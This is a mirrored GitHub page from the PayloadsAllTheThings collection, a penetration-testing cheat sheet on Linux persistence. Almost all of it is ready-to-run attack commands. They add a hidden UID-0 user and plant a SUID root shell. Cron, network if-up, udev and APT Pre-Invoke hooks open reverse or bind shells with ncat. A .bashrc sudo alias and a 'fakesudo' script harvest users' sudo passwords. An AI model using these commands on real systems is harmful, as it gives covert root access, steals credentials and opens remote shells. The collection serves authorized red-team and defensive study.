mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-07 01:26:10 +02:00

llamasoft 78ff651643 Add Linux evasion to its own article

Linux evasion techniques were previously included as part of persistence,
but the number of techniques are varied enough where it likely should
be its own article.

2022-10-14 17:30:25 -04:00

6.1 KiB

Raw Blame History

Linux - Persistence

Summary

Basic reverse shell
Add a root user
Suid Binary
Crontab - Reverse shell
Backdooring a user's bash_rc
Backdooring a startup service
Backdooring a user startup file
Backdooring a driver
Backdooring the APT
Backdooring the SSH
Tips
Additional Linux Persistence Options
References

Basic reverse shell

ncat --udp -lvp 4242
ncat --sctp -lvp 4242
ncat --tcp -lvp 4242

Add a root user

sudo useradd -ou 0 -g 0 john
sudo passwd john
echo "linuxpassword" | passwd --stdin john

Suid Binary

TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant

Crontab - Reverse shell

(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null

Backdooring a user's bash_rc

(FR/EN Version)

TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
cat << EOF > /tmp/$TMPNAME2
  alias sudo='locale=$(locale | grep LANG | cut -d= -f2 | cut -d_ -f1);if [ \$locale  = "en" ]; then echo -n "[sudo] password for \$USER: ";fi;if [ \$locale  = "fr" ]; then echo -n "[sudo] Mot de passe de \$USER: ";fi;read -s pwd;echo; unalias sudo; echo "\$pwd" | /usr/bin/sudo -S nohup nc -lvp 1234 -e /bin/bash > /dev/null && /usr/bin/sudo -S '
EOF
if [ -f ~/.bashrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.bashrc
fi
if [ -f ~/.zshrc ]; then
    cat /tmp/$TMPNAME2 >> ~/.zshrc
fi
rm /tmp/$TMPNAME2

or add the following line inside its .bashrc file.

$ chmod u+x ~/.hidden/fakesudo
$ echo "alias sudo=~/.hidden/fakesudo" >> ~/.bashrc

and create the fakesudo script.

read -sp "[sudo] password for $USER: " sudopass
echo ""
sleep 2
echo "Sorry, try again."
echo $sudopass >> /tmp/pass.txt

/usr/bin/sudo $@

Backdooring a startup service

RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart

Backdooring a user startup file

Linux, write a file in ~/.config/autostart/NAME_OF_FILE.desktop

In : ~/.config/autostart/*.desktop

[Desktop Entry]
Type=Application
Name=Welcome
Exec=/var/lib/gnome-welcome-tour
AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide
OnlyShowIn=GNOME;
X-GNOME-Autostart-enabled=false

Backdooring a driver

echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

Backdooring the APT

If you can create a file on the apt.conf.d directory with: APT::Update::Pre-Invoke {"CMD"}; Next time "apt-get update" is done, your CMD will be executed!

echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor

Backdooring the SSH

Add an ssh key into the ~/.ssh folder.

ssh-keygen
write the content of ~/.ssh/id_rsa.pub into ~/.ssh/authorized_keys
set the right permission, 700 for ~/.ssh and 600 for authorized_keys

6.1 KiB Raw Blame History